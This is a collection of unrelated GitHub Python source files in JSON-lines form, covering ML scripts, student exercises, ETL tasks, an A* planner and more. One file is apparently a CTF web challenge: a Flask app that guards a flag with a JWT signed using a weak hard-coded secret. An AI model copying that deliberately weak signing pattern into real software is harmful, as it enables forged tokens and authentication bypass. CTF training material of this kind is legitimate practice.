rfc_plot.figure_.savefig('images/results/rforest_model_roc.png')\n\n combined_figure = plt.figure(figsize=(15, 8))\n axis = plt.gca()\n rfc_plot.plot(ax=axis, alpha=0.8)\n lrc_plot.plot(ax=axis, alpha=0.8)\n combined_figure.savefig('images/results/combined_roc.png')\n plt.close(combined_figure)\n\n def feature_importance_plot(self):\n '''\n creates and stores the feature importances in pth\n input:\n model: model object containing feature_importances_\n self.x_test: x testing data\n\n output:\n None\n '''\n # Load random forest model\n rfc_model = joblib.load('./models/rfc_model.pkl')\n\n explainer = shap.TreeExplainer(rfc_model)\n shap_values = explainer.shap_values(self.x_test)\n shap.summary_plot(\n shap_values,\n self.x_test,\n plot_type=\"bar\",\n show=False)\n plt.savefig('images/results/feature_importance_SHAP')\n\n\nif __name__ == '__main__':\n predictor = ChurnPredictor(\n 'data/bank_data.csv',\n 'Attrition_Flag',\n 'Attrited Customer')\n","repo_name":"dhedderich/churn-predictor-clean-code","sub_path":"churn_library.py","file_name":"churn_library.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32453338526","text":"list = [\"apex legends\", \"counter strike global offensive\", \"madden\", \"nba 2k\"]\nprint(\"I like these games\")\nfor x in list: \n print(x)\nz = input(\"how many games do you want to add\")\ndef add(amount_of_games):\n for a in range(0, int(amount_of_games)):\n y = input(\"what game do you want to add (one at a time)\")\n list.append(y)\n for x in list:\n print(x)\nadd(z)\n ","repo_name":"Pranav12345678910/ATCS-2021","sub_path":"project0/manyGames.py","file_name":"manyGames.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4438255517","text":"import unittest\n\nfrom source.complex_log_projection import ComplexLogProjection\nfrom source.lat_lng import LatLng\nfrom source.raster_data.function_raster_data_provider import CosSinRasterDataProvider\nfrom source.raster_data.osm_raster_data_provider import OSMRasterDataProvider\nfrom source.raster_projector import RasterProjector, TargetSectionDescription\nfrom source.smoothing_functions import DualCosSmoothingFunction, CosCutoffSmoothingFunction\nfrom source.zoomable_projection import IdentityProjection\nfrom source.hard_coded_providers import get_providers\n\nfrom logging import basicConfig, INFO\n\nfrom test.raster_data.dummy_resolver import dummy_resolver\n\nbasicConfig(level=INFO)\nimport math\n\n\nclass TestRasterProjector(unittest.TestCase):\n def test_grid(self):\n projector = RasterProjector(IdentityProjection(), CosSinRasterDataProvider())\n trange = TargetSectionDescription(-1, 1, 3, -1, 1, 3)\n grid = projector.build_grid(trange)\n assert len(grid.shape) == 2 and grid.shape[1] == 3 * 3\n\n def test_project(self):\n projector = RasterProjector(IdentityProjection(), CosSinRasterDataProvider())\n trange = TargetSectionDescription(0, 2 * math.pi, 200, -1, 1, 100)\n d = projector.project(trange)\n\n assert d.shape[0] == trange.ysteps and d.shape[1] == trange.xsteps\n\n def project_image(self):\n projection = ComplexLogProjection(LatLng(0, 0), LatLng(10, 10), math.pi / 4)\n projector = RasterProjector(projection, CosSinRasterDataProvider())\n trange = TargetSectionDescription(-1, 1, 500, -1, 1, 300)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.show()\n\n def test_project_image_osm(self):\n konstanz = LatLng(47.711801, 9.084545)\n hoffeld = LatLng(48.735051, 9.181156)\n projection = ComplexLogProjection(konstanz, hoffeld, math.pi / 6,\n smoothing_function_type=DualCosSmoothingFunction)\n projector = RasterProjector(projection, OSMRasterDataProvider(dummy_resolver))\n trange = TargetSectionDescription(-math.pi * 2, math.pi * 2, 500, -math.pi, math.pi, 250)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.show()\n\n def test_project_image_osm_small(self):\n konstanz = LatLng(47.711801, 9.084545)\n sealive = LatLng(47.656846, 9.179489) # sealive\n projection = ComplexLogProjection(konstanz, sealive, math.pi / 6,\n smoothing_function_type=CosCutoffSmoothingFunction)\n projector = RasterProjector(projection, OSMRasterDataProvider(dummy_resolver))\n trange = TargetSectionDescription(-math.pi * 2, math.pi * 2, 500, -math.pi, math.pi, 250)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.show()\n\n def test_project_image_osm_wide(self):\n prov = get_providers()\n konstanz = LatLng(47.711801, 9.084545)\n leipzig = LatLng(51.348419,12.370946) #\n projection = ComplexLogProjection(konstanz, leipzig, math.pi / 6,\n smoothing_function_type=CosCutoffSmoothingFunction)\n projector = RasterProjector(projection, prov['transparent'])\n trange = TargetSectionDescription(-math.pi * 4, math.pi * 4, 2000, -math.pi, math.pi, 500)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.savefig(\"sample.png\",dpi=2000)\n plt.clf()\n\n def test_vis_zoomLevel(self):\n\n\n projection1 = ComplexLogProjection(LatLng(0, 0), LatLng(10, 10), math.pi / 4)\n projection2 = ComplexLogProjection(LatLng(-10, -10), LatLng(10, 10), math.pi / 4)\n projector = RasterProjector(projection1, OSMRasterDataProvider(dummy_resolver))\n grid = projector.build_grid(TargetSectionDescription(-4, 4, 400, -2, 2, 200))\n zoom = projection1.getZoomLevel(grid, 100)\n import matplotlib.pyplot as plt\n plt.imshow(zoom.reshape(200, 400))\n plt.colorbar()\n plt.show()\n plt.scatter(range(400), zoom.reshape(200, 400)[10, :])\n plt.show()\n","repo_name":"saildeep/master_backend","sub_path":"test/test_raster_projector.py","file_name":"test_raster_projector.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30475026627","text":"\ns=input()\nt=input()\nk=int(input())\nb=min(len(s),len(t))\np=0\nfor i in range(b):\n if s[i] != t[i]:\n break\n p+=1\nd = len(s)-p\na = len(t)-p\ny = k-(d+a)\nprint(d,a,y)\nif k >= len(t)+len(s):\n print('yes')\n\nelif y%2==0 and y>=0:\n print('Yes')\nelse:\n print('No')\n\n\n\n\n\n","repo_name":"Ananya9878/Hackerrank","sub_path":"IMPLEMENTATION/append_and_delete.py","file_name":"append_and_delete.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10288182555","text":"from nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import PorterStemmer\r\nfrom yake import KeywordExtractor\r\nimport numpy as np \r\nimport pandas as pd\r\nimport os\r\nimport itertools\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nfrom sklearn.preprocessing import LabelBinarizer, LabelEncoder\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom tensorflow import keras\r\nfrom io import StringIO\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.model_selection import cross_val_score\r\nlayers = keras.layers\r\nmodels = keras.models\r\n\r\ndef train_test_split(data, train_size):\r\n train = data[:train_size]\r\n test = data[train_size:]\r\n return train, test\r\n\r\ndef plot_confusion_matrix(cm, classes,title='Confusion matrix',cmap=plt.cm.Blues):\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n\r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title, fontsize=30)\r\n plt.colorbar()\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45, fontsize=22)\r\n plt.yticks(tick_marks, classes, fontsize=22)\r\n\r\n fmt = '.2f'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),horizontalalignment=\"center\",color=\"white\" if cm[i, j] > thresh else \"black\")\r\n\r\n plt.ylabel('True label', fontsize=25)\r\n plt.xlabel('Predicted label', fontsize=25)\r\n\r\n\r\n'''\r\nSolution 1: Using YAKE (https://github.com/LIAAD/yake)\r\n----------\r\n\r\nThis is a handy keyword extraction library so more for tagging but also useful if you rank the tags and then apply the LOWER score that has a match in your category data set. \r\nNote that the LOWER the score, the MORE relevant the keyword extracted. Subtract the floating point from an integer if you want to see it HIGHER but an unnecessary operation IMHO\r\n'''\r\ndef solution1():\r\n inputText=None\r\n with open(\"TESTDATA.TXT\",'r') as f:\r\n inputText=f.read()\r\n extractor=KeywordExtractor()\r\n print(filteredText)\r\n print(extractor.extract_keywords(filteredText))\r\n\r\n'''\r\nEnd of Soultion 1\r\n'''\r\n\r\n'''\r\nSolution 2: Just rename the data set from TESTDATA.CSV\r\n----------\r\n'''\r\ndef solution2():\r\n data = pd.read_csv(\"TESTDATA.CSV\")\r\n train_size = int(len(data) * .8)\r\n print (\"Train size: %d\" % train_size)\r\n print (\"Test size: %d\" % (len(data) - train_size))\r\n train_cat, test_cat = train_test_split(data['category'], train_size)\r\n train_text, test_text = train_test_split(data['text'], train_size)\r\n max_words = 1000\r\n tokenize = keras.preprocessing.text.Tokenizer(num_words=max_words,char_level=False)\r\n #Fit tokenizer to our training text data\r\n tokenize.fit_on_texts(train_text) \r\n x_train = tokenize.texts_to_matrix(train_text)\r\n x_test = tokenize.texts_to_matrix(test_text)\r\n #Utility to convert label strings to numbered index\r\n encoder = LabelEncoder()\r\n encoder.fit(train_cat)\r\n y_train = encoder.transform(train_cat)\r\n y_test = encoder.transform(test_cat)\r\n #Converts the labels to a one-hot representation\r\n num_classes = np.max(y_train) + 1\r\n y_train = keras.utils.to_categorical(y_train, num_classes)\r\n y_test = keras.utils.to_categorical(y_test, num_classes)\r\n '''\r\n This model trains very quickly and 2 epochs are already more than enough\r\n Training for more epochs will likely lead to overfitting on this dataset\r\n You can try tweaking these hyperparamaters when using this model with your own data\r\n '''\r\n batch_size = 32\r\n epochs = 2\r\n drop_ratio = 0.5\r\n model = models.Sequential()\r\n model.add(layers.Dense(512, input_shape=(max_words,)))\r\n model.add(layers.Activation('relu'))\r\n model.add(layers.Dense(num_classes))\r\n model.add(layers.Activation('softmax'))\r\n model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\r\n history = model.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_split=0.1)\r\n\r\n #Following is to simply visualize the output \r\n y_softmax = model.predict(x_test)\r\n text_labels = encoder.classes_\r\n y_test_1d = []\r\n y_pred_1d = []\r\n\r\n for i in range(len(y_test)):\r\n probs = y_test[i]\r\n index_arr = np.nonzero(probs)\r\n one_hot_index = index_arr[0].item(0)\r\n y_test_1d.append(one_hot_index)\r\n\r\n for i in range(0, len(y_softmax)):\r\n probs = y_softmax[i]\r\n predicted_index = np.argmax(probs)\r\n y_pred_1d.append(predicted_index)\r\n\r\n cnf_matrix = confusion_matrix(y_test_1d, y_pred_1d)\r\n plt.figure(figsize=(18,14))\r\n plot_confusion_matrix(cnf_matrix, classes=text_labels, title=\"Confusion matrix\")\r\n plt.show()\r\n\r\n'''\r\nEnd of Solution 2\r\n'''\r\n\r\n'''\r\nSolution 3: LinearSVCs can at times be more accurate than NaiveBayes, don't forget to rename from TESTDATA.CSV to the uri of your file\r\n\r\nWARNING - You may run into some memory errors if you do not have enough RAM (cause of high volume input)\r\n----------\r\n'''\r\ndef solution3():\r\n df = pd.read_csv('TESTDATA.CSV')\r\n df = df[pd.notnull(df['Consumer complaint narrative'])]\r\n col = ['Product', 'Consumer complaint narrative']\r\n df = df[col]\r\n df['category_id'] = df['Product'].factorize()[0]\r\n category_id_df = df[['Product', 'category_id']].drop_duplicates().sort_values('category_id')\r\n category_to_id = dict(category_id_df.values)\r\n id_to_category = dict(category_id_df[['category_id', 'Product']].values)\r\n tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2), stop_words='english')\r\n\r\n features = tfidf.fit_transform(df['Consumer complaint narrative']).toarray()\r\n labels = df.category_id\r\n\r\n models = [\r\n RandomForestClassifier(n_estimators=200, max_depth=3, random_state=0),\r\n LinearSVC(),\r\n MultinomialNB(),\r\n LogisticRegression(random_state=0),\r\n ]\r\n cv_df = pd.DataFrame(index=range(5 * len(models)))\r\n entries = []\r\n for model in models:\r\n model_name = model.__class__.__name__\r\n accuracies = cross_val_score(model, features, labels, scoring='accuracy', cv=5)\r\n for fold_idx, accuracy in enumerate(accuracies):\r\n entries.append((model_name, fold_idx, accuracy))\r\n cv_df = pd.DataFrame(entries, columns=['model_name', 'fold_idx', 'accuracy'])\r\n print(cv_df.groupby('model_name').accuracy.mean())\r\n\r\n'''\r\nEnd of Solution 3\r\n'''\r\n#solution1()\r\n#solution2()\r\n#solution3()\r\n","repo_name":"krypted/lightweightcategorizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"16579126666","text":"from cs50 import get_int\nimport math\n\n\ndef main():\n # prompt for input\n while True:\n card = get_int(\"Number: \")\n if card > 0:\n break\n\n # help vaiables\n counter, numbers, help1, befor_last, last = 0, 0, 0, 0, 0\n temp = card\n # to change once multuply and once not\n x = False\n # do throught each number\n while temp > 0:\n numbers += 1\n if temp < 100 and temp > 9:\n befor_last = temp % 10\n\n elif temp < 10 and temp >= 0:\n last = temp\n # divide to go to the second number\n help1 = temp % 10\n temp = math.trunc(temp / 10)\n if x:\n help1 *= 2\n if help1 > 9:\n help1 -= 9\n\n counter += help1\n\n else:\n counter += help1\n\n x = not x\n # if the card is real find which company\n if counter % 10 == 0:\n if numbers == 15 and last == 3 and (befor_last == 4 or befor_last == 7):\n print(\"AMEX\")\n\n elif (numbers == 16 or numbers == 13) and last == 4:\n print(\"VISA\")\n\n elif numbers == 16 and last == 5 and (befor_last == 1 or befor_last == 2 or befor_last == 3 or befor_last == 4 or befor_last == 5):\n print(\"MASTERCARD\")\n\n else:\n print(\"INVALID\")\n\n else:\n print(\"INVALID\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"imadham/cs50","sub_path":"pset6/credit/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34218228783","text":"from openpyxl import workbook\nfrom openpyxl import load_workbook\nfrom openpyxl import worksheet\nfrom openpyxl.cell import Cell\n\nTITLE_COLUMN = 5\nID_COLUMN = 1\nSTATUS_COLUMN = 3\nVERSION_COLUMN = 8\n\n\ndef find_in_file(file_name, text):\n\n wb = load_workbook(file_name)\n # 只支持第一sheet\n ws = wb.active\n for row_no in range(1, ws.max_row + 1):\n cell = ws.cell(row=row_no, column=TITLE_COLUMN)\n if cell.data_type == Cell.TYPE_STRING and cell.value.find(text) > 0:\n return [\n ws.cell(row=cell.row, column=ID_COLUMN).value,\n ws.cell(row=cell.row, column=STATUS_COLUMN).value,\n ws.cell(row=cell.row, column=VERSION_COLUMN).value\n ]\n\n\ncollection_book = load_workbook('collection.xlsx')\n\ncollection_sheet = collection_book.active\n\nfor row_num in range(1, collection_sheet.max_row + 1):\n substring = collection_sheet.cell(row=row_num, column=9).value[-10:-3]\n result = find_in_file(\"issues.xlsx\", substring)\n if result is not None:\n collection_sheet.cell(row=row_num, column=20).value = result[0]\n collection_sheet.cell(row=row_num, column=20).hyperlink =\\\n \"http://10.199.129.57/redmine/issues/{}\".format(result[0])\n collection_sheet.cell(row=row_num, column=21).value = result[1]\n collection_sheet.cell(row=row_num, column=22).value = result[2]\n\ncollection_book.save('collection.xlsx')\n","repo_name":"ushisoft/pizza","sub_path":"findinsheet.py","file_name":"findinsheet.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31848322646","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import home,login,register,addissues,myissues,resolverlogin,employeeregister\n \n\n\nurlpatterns = [\n path('', home.Index.as_view(),name='homepage'),\n path('login',login.Login.as_view(),name='login'),\n path('register',register.Register.as_view(),name='register'),\n path('addissues',addissues.Addissues.as_view(),name='addissues'),\n path('logout/',login.logout,name='logout'),\n path('myissues', myissues.Myissues.as_view() ,name='myissues'),\n path('resolverlogin', resolverlogin.Resolverlogin.as_view() ,name='resolverlogin'),\n path('employeeregister', employeeregister.Employeeregister.as_view() ,name='employeeregister'),\n\n\n # path('cart',cart.Cart.as_view(),name='cart'),\n # path('check_out',auth_middleware(check_out.CheckOut.as_view()),name='check_out'),\n # path('orders',auth_middleware(orders.OrderView.as_view()),name='orders'),\n # path('seller',seller.Seller.as_view(),name='seller'),\n\n \n]\n","repo_name":"Archana-9/Devathon22-Team102-PS05","sub_path":"Issue_Resolver/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3580697","text":"import heapq as hq\nfrom config import *\nfrom utility import *\n# linked node to connect node with its parent and remember pos\nclass Node:\n def __init__(self, parent, pos):\n self.pos = pos\n self.prev = parent\n\n# Astar planning\ndef astar(start, goal, distMethod, expandMethod, robot, env):\n\n # Init\n # print 'Planning Query: from %s to %s'%(str(start),str(goal))\n prevKey = getKey(start)\n h = { prevKey:heuristic(start, goal, distMethod) }\n g = { prevKey:0 }\n frontiers = [ (h[prevKey]*H_PRIOR+g[prevKey], Node(None, np.array(start))) ]\n goalNode = None; explored = []; collided = [];\n it = 0\n\n # Astar main loop\n while len(frontiers)!=0 and it<MAX_ITER:\n\n # Goal Test\n # percent = float(100*it)/MAX_ITER\n # print '{0}\\r'.format('|' * int(percent+1) + '%s'%str(percent) + '%'),\n node = hq.heappop(frontiers)[1]\n prevKey = getKey(node.pos)\n explored.append(node.pos)\n if goaltest(node.pos, goal, distMethod):\n goalNode = node\n break\n\n # Expand successor\n for point in expandMethod(node.pos):\n key = getKey(point)\n step_cost = heuristic(point, node.pos, distMethod)\n if (key in g) and (g[key]<=g[prevKey]+step_cost):\n continue\n if isCollided(point, robot, env):\n collided.append(point)\n continue\n h[key] = heuristic(point, goal, distMethod)\n g[key] = g[prevKey] + step_cost\n hq.heappush(frontiers, (h[key]*H_PRIOR+g[key], Node(node, point)))\n it += 1\n #try: \n # print '\\r{0}'.format(' '*120) + '\\rOptimization: %s'%(str( g[prevKey]))\n # print 'Iteration: ' + '|' * int(percent+1) + '%s'%str(percent) + '%'\n #except:\n #pass\n #finally:\n return goalNode, explored, collided\n\n# Anastar cost\ndef getCost(G, g, h):\n return (G-g)/h\n\n# Goal test\ndef goaltest(pos, goal, distMethod):\n return heuristic(pos, goal, distMethod) < MAX_ERR\n\n# Heuristic loss\ndef heuristic(pos1, pos2, distMethod):\n return distMethod(pos1, pos2)\n\n# Collision test\ndef isCollided(pos, robot, env):\n robot.SetActiveDOFValues(pos)\n for i,body in enumerate(env.GetBodies()):\n if env.CheckCollision(robot, body):\n return True\n return False\n","repo_name":"uniericuni/Robot-Team","sub_path":"planning.py","file_name":"planning.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12007165099","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nfrom LinearTriangulation import *\nfrom Helper.ImageHelper import *\n\nclass Disambiguate():\n def __init__(self, inliers, K) -> None:\n self.inliers = inliers\n self.K = K\n\n def chiralityCheck(self, X, R, C):\n count = 0\n r3 = R[2]\n for x in X:\n # pry()\n if(np.dot(r3, x-C).any())>0:\n count += 1\n return count\n\n def disambiguateCameraPose(self,C2, R2, P1,K):\n '''\n Inputs:\n C2\n R2\n P1\n K\n '''\n\n # find the maximum number of points in both\n # camera poses\n # the one with max points is the correct answer\n maxCount = 0\n plotHelper = Plot()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n x1 = self.inliers[:, 0:2]\n x2 = self.inliers[:, 2:4]\n bestX, bestC, bestR = None, None, None\n # linTriangle = LinearTriangulation(self.K)\n index = 0\n for r2, c2 in zip(R2, C2):\n c2 = c2.reshape((3, 1))\n X2 = LinearTrinagulation(P1, c2, r2, K,x1, x2)\n # X2 = linTriangle.LinearTriangulation(C1, R1, c2, r2, x1, x2)\n # pry()\n count = self.chiralityCheck(X2, r2, c2)\n plotHelper.plotTriangle(X2, c2, r2, index)\n if count > maxCount:\n print(count)\n maxCount = count\n bestR = r2\n bestC = c2\n bestX = X2\n i = index\n index += 1\n # print(\"Found best x\")\n\n plt.xlim(-5, 5)\n plt.ylim(-5, 5)\n # plt.show()\n\n # fig = plt.figure()\n # ax = fig.add_subplot(111)\n # plotHelper.plotTriangle(bestX, bestC, bestR, i)\n # plt.xlim(-5, 5)\n # plt.ylim(-5, 5)\n # # plt.show()\n\n return bestX, bestC, bestR, i\n","repo_name":"zen1405/Nerf-SFM-P3","sub_path":"Phase1/DisambiguateCameraPose.py","file_name":"DisambiguateCameraPose.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24217656222","text":"from datetime import timedelta\nfrom prefect import task\nfrom prefect.tasks import task_input_hash\nfrom pipelines import Pipeline\n\nimport pandas as pd\nfrom pandas import DataFrame, read_csv\nfrom pandas.io.parsers import TextFileReader\n\nimport pathlib\nimport os\nimport json\n\nfrom prefect_gcp.cloud_storage import GcsBucket\n\nfrom prefect_gcp import GcpCredentials\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef extract_data(p: Pipeline):\n # print(\"Extracting Data...\")\n return p.fetch_data()\n\n\n@task(\n # cache_key_fn=task_input_hash,\n # cache_expiration=timedelta(days=1),\n)\ndef fetch_chunks(filepath: str, chunk_size: int):\n return read_csv(filepath, iterator=True, chunksize=chunk_size)\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef transform_data(p: Pipeline, chunk: DataFrame):\n return p.data_transform(chunk)\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef insert_data(p: Pipeline, chunk: DataFrame):\n p.insert_rows(chunk)\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef create_table(p: Pipeline, chunk: DataFrame):\n p.create_table(chunk)\n\n\n# ---------- GCP Code -------------------------\n@task(retries=3)\ndef fetch(url: str) -> DataFrame:\n return pd.read_csv(url)\n\n\n@task(log_prints=True)\ndef clean(df: DataFrame) -> DataFrame:\n # Make columns lowercase\n df.columns = [str(column).lower() for column in df.columns]\n\n # Convert string datetime into pandas datetime\n if \"tpep_pickup_datetime\" in df.columns:\n df.tpep_pickup_datetime = pd.to_datetime(df.tpep_pickup_datetime)\n\n if \"tpep_dropoff_datetime\" in df.columns:\n df.tpep_dropoff_datetime = pd.to_datetime(df.tpep_dropoff_datetime)\n\n if \"lpep_pickup_datetime\" in df.columns:\n df.lpep_pickup_datetime = pd.to_datetime(df.lpep_pickup_datetime)\n\n if \"lpep_dropoff_datetime\" in df.columns:\n df.lpep_dropoff_datetime = pd.to_datetime(df.lpep_dropoff_datetime)\n\n # Filter data of trips that has zero passengers\n # df = df[df[\"passenger_count\"] != 0]\n\n return df\n\n\n@task\ndef write_parquet_file(df: DataFrame, filename: str) -> pathlib.Path:\n path = pathlib.Path(f\"data/{filename}.parquet\")\n if not os.path.exists(\"data\"):\n os.makedirs(\"data/\")\n df.to_parquet(path=path, compression=\"gzip\")\n return path\n\n\n@task(retries=3)\ndef write_to_gcs(source: str, destination: str) -> None:\n gcs_block = GcsBucket.load(\"gcs-data-store\")\n gcs_block.upload_from_path(from_path=source, to_path=destination) # type: ignore typing does not work for this library\n\n\n@task(retries=3)\ndef extract_from_gcs(path: str) -> pathlib.Path:\n # Get data from gcs and write to local filesystem\n dest = \"./gcp\"\n gcs_block = GcsBucket.load(\"gcs-data-store\")\n gcs_block.get_directory(from_path=path, local_path=dest) # type: ignore\n return pathlib.Path(f\"{dest}/{path}\")\n\n\n@task\ndef create_schema_json(df: DataFrame, color: str, year: int, month: int):\n schema: dict = pd.io.json.build_table_schema(df) # type: ignore\n if not os.path.exists(\"./schema\"):\n os.makedirs(\"schema/\")\n open(f\"./schema/{color}_tripdata_{year}-{month:02}.json\", \"w+\").write(\n json.dumps(schema)\n )\n\n\n@task(log_prints=True)\ndef transform_gcs_data(path: pathlib.Path) -> DataFrame:\n df = pd.read_parquet(path)\n print(f\"*************** {df.shape[0]} \")\n # print(\n # f\"before replacement: number of zero passenger trips: {df['passenger_count'].isna().sum()}\"\n # )\n # df[\"passenger_count\"].fillna(0, inplace=True) # replace 0 values with NA\n # print(\n # f\"after after replacement: number of zero passenger trips: {df['passenger_count'].isna().sum()}\"\n # )\n return df\n\n\n@task\ndef upload_to_bq(df: DataFrame, color: str) -> None:\n gcp_credentials_block = GcpCredentials.load(\"service-account-cred\")\n df.to_gbq(\n destination_table=f\"de_zoomcamp_dataset.{color}_taxi_data\",\n project_id=\"de-zoomcamp-376020\",\n credentials=gcp_credentials_block.get_credentials_from_service_account(), # type: ignore\n chunksize=10_000,\n if_exists=\"append\",\n )\n","repo_name":"vuvuzella/de_zoomcamp_2023","sub_path":"week_2/application/etl_project/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37701289207","text":"from flask import Flask, request, render_template, url_for, make_response\nimport json, jwt, time, os, random, sqlite3\n\napp = Flask(\n __name__, \n template_folder=\"templates\",\n static_folder=\"static\",\n static_url_path=\"\"\n )\nkey = \"mylittlesecret\"\n\n\n@app.route(\"/get_ticket\", methods=['GET'])\ndef get_token():\n sesh_token = jwt.encode({'conductor': False, 'now': time.time()}, key, algorithm='HS256')\n #r = make_response(render_template(\"ticket.html\", token=sesh_token.decode(\"utf-8\")))\n r = make_response(render_template(\"ticket.html\", token=sesh_token))\n r.set_cookie('jwt', sesh_token)\n return r\n\n\n@app.route(\"/conductor_seat\", methods=['POST', 'GET'])\ndef get_flag():\n try:\n payload = jwt.decode(request.cookies.get('jwt'), key, algorithms=['HS256'])\n if payload['conductor']:\n return render_template(\"conductor.html\", flag=\"pecan{bRu73f0rc3-w34k-K3yz}\")\n else:\n return render_template(\"bruh.html\", image=\"angry.gif\", msg=\"Hey! You aren't the train conductor!\")\n except:\n return render_template(\"bruh.html\", msg=\":^(\")\n\n\n@app.route(\"/train\", methods=['GET'])\ndef train():\n try:\n if 'jwt' in request.cookies:\n return render_template(\"train.html\")\n else:\n return render_template(\"bruh.html\", msg=\"You need a ticket to get on the train!\")\n except:\n return render_template(\"bruh.html\", msg=\":^(\")\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef main():\n con = sqlite3.connect(\"hints.db\")\n con.row_factory = sqlite3.Row\n c = con.cursor()\n c.execute(\"SELECT hint from hints ORDER BY RANDOM() LIMIT 1;\")\n out = c.fetchall()\n if request.method == \"POST\":\n return render_template(\"index.html\", hint=out)\n else:\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n\n\n","repo_name":"ECUComputingAndSecurity/PeCanCTF-2022-Public","sub_path":"web/tickets-please/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10598802234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 29 09:16:36 2021\r\n\r\n@author: rohin\r\n\"\"\"\r\n\r\nfrom numpy import mean\r\nfrom numpy import std\r\nfrom matplotlib import pyplot\r\nfrom sklearn.model_selection import KFold\r\n#from keras.datasets import mnist\r\n#from keras.utils import to_categorical\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.optimizers import SGD\r\n#from cpar.digit import load_data\r\nimport gzip\r\nimport os\r\nfrom urllib.request import urlretrieve\r\n\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\n\r\n\r\nBASE_URL = \"https://cpar.s3.amazonaws.com/\"\r\n\r\n\r\ndef download_from_s3(file_name):\r\n \r\n download_url = BASE_URL + file_name\r\n save_path = os.path.join('data', file_name)\r\n urlretrieve(download_url, save_path)\r\n\r\ndef load_data(path=None):\r\n \"\"\"Loads the cpar-char dataset.\r\n # Returns\r\n Tuple of Numpy arrays: `(trainX, trainY), (testX, testY)`.\r\n \"\"\"\r\n files = ['digit_train-labels-idx1-ubyte.gz', 'digit_train-images-idx3-ubyte.gz', \r\n 'digit_test-labels-idx1-ubyte.gz', 'digit_test-images-idx3-ubyte.gz']\r\n \r\n paths = []\r\n if path is None:\r\n if os.path.isdir('data') is not True:\r\n os.mkdir('data')\r\n for fname in tqdm(files):\r\n if os.path.exists(os.path.join('data', fname)) is False:\r\n download_from_s3(fname)\r\n paths.append(fname)\r\n\r\n with gzip.open(os.path.join('data', paths[0]), 'rb') as lbpath:\r\n trainY = np.frombuffer(lbpath.read(), np.uint8, offset=8)\r\n\r\n with gzip.open(os.path.join('data', paths[1]), 'rb') as imgpath:\r\n 